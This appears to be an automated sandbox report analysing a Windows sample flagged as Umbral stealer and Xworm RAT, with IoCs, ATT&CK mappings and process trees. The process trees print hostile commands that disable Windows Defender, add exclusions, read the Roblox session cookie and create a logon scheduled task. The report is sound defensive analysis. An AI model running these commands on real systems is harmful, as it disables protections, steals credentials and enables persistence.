umbral | 40596da4af2b1b0387147484d112423d317e2fd41cd19bb1b63d2f8429bacee4

Analysis

max time kernel
1198s
max time network
1205s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
08-06-2024 07:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

download.exe
Size

88KB
MD5

94c73dc6cc79de28524a82f04adc7c6b
SHA1

8ce1411adede8a1485ad718160ef01c7a22634de
SHA256

40596da4af2b1b0387147484d112423d317e2fd41cd19bb1b63d2f8429bacee4
SHA512

820b38de02b00668b24e6dc0510f632a7648bd1e647f5a9ee0c7d8bd8b86a49b55db72e1cfa2eff0337dc30d6b1cb45af1f904a9105715618d410ff56841d041
SSDEEP

768:+CIFqF93IfXwXbOfq1okh8BBEjpaPWfu/WYat7PTXDvt976xrXu5Me0:+C4qF9pbOAh8B+Bfu+YaZTXTt97KruM

Score

10^/10

umbral xworm execution ransomware rat spyware stealer trojan

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000700000002327e-55.dat	family_umbral
behavioral3/memory/2376-62-0x0000025998C20000-0x0000025998C60000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000700000002327b-48.dat	family_xworm
behavioral3/memory/2000-50-0x0000000000480000-0x000000000049A000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3316	powershell.exe
4080	powershell.exe
2644	powershell.exe
5448	powershell.exe
3748	powershell.exe
4652	powershell.exe
2616	powershell.exe
2204	powershell.exe
3192	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	svchost‌.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	svchost‌.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	svchost‌.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	download.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	svchost‌.exe

Executes dropped EXE 21 IoCs

pid	Process
368	remote.exe
2000	svchost‌.exe
2376	skid.exe
2328	svchost‌.exe
4972	svchost‌.exe
3972	svchost‌.exe
5528	svchost‌.exe
4288	svchost‌.exe
904	svchost‌.exe
5780	svchost‌.exe
4932	svchost‌.exe
5648	svchost‌.exe
5140	svchost‌.exe
2876	svchost‌.exe
6112	svchost‌.exe
3388	svchost‌.exe
2184	svchost‌.exe
2264	svchost‌.exe
5556	svchost‌.exe
1136	svchost‌.exe
2512	svchost‌.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
65	discord.com
74	raw.githubusercontent.com
154	raw.githubusercontent.com
158	raw.githubusercontent.com
1	raw.githubusercontent.com
66	raw.githubusercontent.com
67	raw.githubusercontent.com
64	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
61	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\svchost‌.exe	remote.exe
File opened for modification	C:\Windows\System32\svchost‌.exe	remote.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	svchost‌.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3784	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5748	wmic.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2956	download.exe
3316	powershell.exe
3316	powershell.exe
3316	powershell.exe
5160	powershell.exe
5160	powershell.exe
5160	powershell.exe
4404	powershell.exe
4404	powershell.exe
4404	powershell.exe
4652	powershell.exe
4652	powershell.exe
5616	powershell.exe
5616	powershell.exe
5616	powershell.exe
4652	powershell.exe
2616	powershell.exe
2616	powershell.exe
2616	powershell.exe
4792	powershell.exe
4792	powershell.exe
4792	powershell.exe
2000	svchost‌.exe
2204	powershell.exe
2204	powershell.exe
3192	powershell.exe
3192	powershell.exe
2328	svchost‌.exe
4080	powershell.exe
4080	powershell.exe
2644	powershell.exe
2644	powershell.exe
1136	svchost‌.exe
5448	powershell.exe
5448	powershell.exe
3748	powershell.exe
3748	powershell.exe
2512	svchost‌.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2956	download.exe
Token: SeDebugPrivilege	2376	skid.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	2000	svchost‌.exe
Token: SeDebugPrivilege	5160	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	5616	powershell.exe
Token: SeIncreaseQuotaPrivilege	2224	wmic.exe
Token: SeSecurityPrivilege	2224	wmic.exe
Token: SeTakeOwnershipPrivilege	2224	wmic.exe
Token: SeLoadDriverPrivilege	2224	wmic.exe
Token: SeSystemProfilePrivilege	2224	wmic.exe
Token: SeSystemtimePrivilege	2224	wmic.exe
Token: SeProfSingleProcessPrivilege	2224	wmic.exe
Token: SeIncBasePriorityPrivilege	2224	wmic.exe
Token: SeCreatePagefilePrivilege	2224	wmic.exe
Token: SeBackupPrivilege	2224	wmic.exe
Token: SeRestorePrivilege	2224	wmic.exe
Token: SeShutdownPrivilege	2224	wmic.exe
Token: SeDebugPrivilege	2224	wmic.exe
Token: SeSystemEnvironmentPrivilege	2224	wmic.exe
Token: SeRemoteShutdownPrivilege	2224	wmic.exe
Token: SeUndockPrivilege	2224	wmic.exe
Token: SeManageVolumePrivilege	2224	wmic.exe
Token: 33	2224	wmic.exe
Token: 34	2224	wmic.exe
Token: 35	2224	wmic.exe
Token: 36	2224	wmic.exe
Token: SeIncreaseQuotaPrivilege	2224	wmic.exe
Token: SeSecurityPrivilege	2224	wmic.exe
Token: SeTakeOwnershipPrivilege	2224	wmic.exe
Token: SeLoadDriverPrivilege	2224	wmic.exe
Token: SeSystemProfilePrivilege	2224	wmic.exe
Token: SeSystemtimePrivilege	2224	wmic.exe
Token: SeProfSingleProcessPrivilege	2224	wmic.exe
Token: SeIncBasePriorityPrivilege	2224	wmic.exe
Token: SeCreatePagefilePrivilege	2224	wmic.exe
Token: SeBackupPrivilege	2224	wmic.exe
Token: SeRestorePrivilege	2224	wmic.exe
Token: SeShutdownPrivilege	2224	wmic.exe
Token: SeDebugPrivilege	2224	wmic.exe
Token: SeSystemEnvironmentPrivilege	2224	wmic.exe
Token: SeRemoteShutdownPrivilege	2224	wmic.exe
Token: SeUndockPrivilege	2224	wmic.exe
Token: SeManageVolumePrivilege	2224	wmic.exe
Token: 33	2224	wmic.exe
Token: 34	2224	wmic.exe
Token: 35	2224	wmic.exe
Token: 36	2224	wmic.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeIncreaseQuotaPrivilege	4812	wmic.exe
Token: SeSecurityPrivilege	4812	wmic.exe
Token: SeTakeOwnershipPrivilege	4812	wmic.exe
Token: SeLoadDriverPrivilege	4812	wmic.exe
Token: SeSystemProfilePrivilege	4812	wmic.exe
Token: SeSystemtimePrivilege	4812	wmic.exe
Token: SeProfSingleProcessPrivilege	4812	wmic.exe
Token: SeIncBasePriorityPrivilege	4812	wmic.exe
Token: SeCreatePagefilePrivilege	4812	wmic.exe
Token: SeBackupPrivilege	4812	wmic.exe
Token: SeRestorePrivilege	4812	wmic.exe
Token: SeShutdownPrivilege	4812	wmic.exe
Token: SeDebugPrivilege	4812	wmic.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2000	svchost‌.exe
2328	svchost‌.exe
1136	svchost‌.exe
2512	svchost‌.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 2956 wrote to memory of 3556	2956	download.exe	91
PID 2956 wrote to memory of 3556	2956	download.exe	91
PID 3556 wrote to memory of 3264	3556	csc.exe	93
PID 3556 wrote to memory of 3264	3556	csc.exe	93
PID 2956 wrote to memory of 3784	2956	download.exe	104
PID 2956 wrote to memory of 3784	2956	download.exe	104
PID 2956 wrote to memory of 368	2956	download.exe	105
PID 2956 wrote to memory of 368	2956	download.exe	105
PID 368 wrote to memory of 1164	368	remote.exe	106
PID 368 wrote to memory of 1164	368	remote.exe	106
PID 2956 wrote to memory of 2376	2956	download.exe	109
PID 2956 wrote to memory of 2376	2956	download.exe	109
PID 2376 wrote to memory of 3316	2376	skid.exe	110
PID 2376 wrote to memory of 3316	2376	skid.exe	110
PID 2376 wrote to memory of 5160	2376	skid.exe	112
PID 2376 wrote to memory of 5160	2376	skid.exe	112
PID 2000 wrote to memory of 4652	2000	svchost‌.exe	114
PID 2000 wrote to memory of 4652	2000	svchost‌.exe	114
PID 2376 wrote to memory of 4404	2376	skid.exe	116
PID 2376 wrote to memory of 4404	2376	skid.exe	116
PID 2376 wrote to memory of 5616	2376	skid.exe	118
PID 2376 wrote to memory of 5616	2376	skid.exe	118
PID 2000 wrote to memory of 2616	2000	svchost‌.exe	120
PID 2000 wrote to memory of 2616	2000	svchost‌.exe	120
PID 2376 wrote to memory of 2224	2376	skid.exe	122
PID 2376 wrote to memory of 2224	2376	skid.exe	122
PID 2376 wrote to memory of 4812	2376	skid.exe	124
PID 2376 wrote to memory of 4812	2376	skid.exe	124
PID 2376 wrote to memory of 4256	2376	skid.exe	126
PID 2376 wrote to memory of 4256	2376	skid.exe	126
PID 2376 wrote to memory of 4792	2376	skid.exe	128
PID 2376 wrote to memory of 4792	2376	skid.exe	128
PID 2376 wrote to memory of 5748	2376	skid.exe	130
PID 2376 wrote to memory of 5748	2376	skid.exe	130
PID 2000 wrote to memory of 2328	2000	svchost‌.exe	132
PID 2000 wrote to memory of 2328	2000	svchost‌.exe	132
PID 2328 wrote to memory of 2204	2328	svchost‌.exe	133
PID 2328 wrote to memory of 2204	2328	svchost‌.exe	133
PID 2328 wrote to memory of 3192	2328	svchost‌.exe	135
PID 2328 wrote to memory of 3192	2328	svchost‌.exe	135
PID 2328 wrote to memory of 1492	2328	svchost‌.exe	142
PID 2328 wrote to memory of 1492	2328	svchost‌.exe	142
PID 1136 wrote to memory of 4080	1136	svchost‌.exe	169
PID 1136 wrote to memory of 4080	1136	svchost‌.exe	169
PID 1136 wrote to memory of 2644	1136	svchost‌.exe	171
PID 1136 wrote to memory of 2644	1136	svchost‌.exe	171
PID 2512 wrote to memory of 5448	2512	svchost‌.exe	175
PID 2512 wrote to memory of 5448	2512	svchost‌.exe	175
PID 2512 wrote to memory of 3748	2512	svchost‌.exe	177
PID 2512 wrote to memory of 3748	2512	svchost‌.exe	177

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\download.exe
"C:\Users\Admin\AppData\Local\Temp\download.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xcca2gx1\xcca2gx1.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3556
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES122B.tmp" "c:\Users\Admin\AppData\Local\Temp\xcca2gx1\CSC675909DC83D240FB9EE5F94F17C3DD6B.TMP"
    3⤵
    PID:3264
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /Create /SC ONLOGON /TN Updatew /TR C:\Users\Admin\150F4013\temp\run.cmd /RL HIGHEST /F
  2⤵
  - Creates scheduled task(s)
  PID:3784
- C:\Users\Admin\150F4013\remote.exe
  "C:\Users\Admin\150F4013\remote.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:368
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /run /TN Update
    3⤵
    PID:1164
- C:\Users\Admin\AppData\Local\Temp\skid.exe
  "C:\Users\Admin\AppData\Local\Temp\skid.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\skid.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5616
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2224
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4792
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3104 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
1⤵
PID:1660

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\svchost‌.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost‌.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\System32\svchost‌.exe
  "C:\Windows\System32\svchost‌.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\svchost‌.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost‌.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
    3⤵
    PID:1492

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:4972

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:3972

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:5528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=3988 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:1
1⤵
PID:1836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=1036 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:1
1⤵
PID:4544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5772 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
1⤵
PID:4308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=5528 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:1
1⤵
PID:1420

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:4288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6048 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
1⤵
PID:6100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5536 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
1⤵
PID:5048

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:904

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:5780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5288 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
1⤵
PID:4492

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:4932

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:5648

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:5140

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:2876

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:6112

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:3388

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:2184

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:2264

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Executes dropped EXE
PID:5556

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\svchost‌.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost‌.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2644

C:\Windows\System32\svchost‌.exe
C:\Windows\System32\svchost‌.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\svchost‌.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost‌.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\150F4013\remote.exe

Filesize
258KB

MD5
5b361316509f8f3194eb12dd8b741c6c

SHA1
e98492f076095a6f323e80277ad55bc0639406aa

SHA256
2c94d9e87ad5c843048c4a09c3733b1d0326f3b5ce6a40e7b964f45034011dd4

SHA512
8b22c6147703bc05f3405db877061d64642a3353661c7893482e9c8c897453e1edde3a39abdcda18ed50c296a520efb1430a2a0a7c1d119de363d72bb360abd0

Download Submit
C:\Users\Admin\150F4013\temp\run.cmd

Filesize
230B

MD5
414df6503c9c035562085abea409a80a

SHA1
2eaaea0bc22b4fc6ad05c0acc0612ca3c72cb21d

SHA256
13a32b30bbbdca31954c5090e4cd5f191635dd6316f9f9669613865cb713eacb

SHA512
6c7dee2462193bda3176fce634e642302c1e14b7329eb4408dc26b1a0d7e57a81f3cc5f143371691f6d3803cb66bd35035184d5df4dee8798b22e478e4966e09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost‌.exe.log

Filesize
1KB

MD5
845d57bd2302443a61241c5d24050ddd

SHA1
69c6cf0a7b3040a0e4f5829325e500957feb5b60

SHA256
76ea82889e1e78955ad0fc36e273ffe9006a4bb71cf27c196a3c145bcde202b9

SHA512
e954e8f11f70e0c9e9814c945f50e1a078428a57e5fafb6103c2a21cca5fd466836a867f80269434c2539aabf308a8aa49da67ca539a679c390f49628b39fa62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
ecac37a294a8f17b9c89abc6354cb1fe

SHA1
b918fd8ca0ec11fc4a39633a8dc94abe60140eb9

SHA256
51037b293178bc395824bb6fd9b80ba7c23399c4e4a74f0bc067a557a1da9fb8

SHA512
7b5e3032a2848f46cbf330b06693304945e4257cc2a7220f28adaa7b71aad7f63872379aebe6f1cfb68b78a9605d3ed5c1ddc6549f720e9bb7ac95b1c2a0ed64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a0eba43803636736db7bc5e4f422322c

SHA1
1a7969aa9a0d5dde09586c5994abb7e9ce8b7e32

SHA256
3693c793ab68cf90adb3e99c99bb4a924af310a28a1d9b795c735b7c95992dcd

SHA512
b3ed8c4166a522fdedd82816b75ac47e886296ca80c41c050fa947497997fca256036f8eccb26b288d2ad3208c8346cc3e8a8931324983077b999d47151e3937

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
292B

MD5
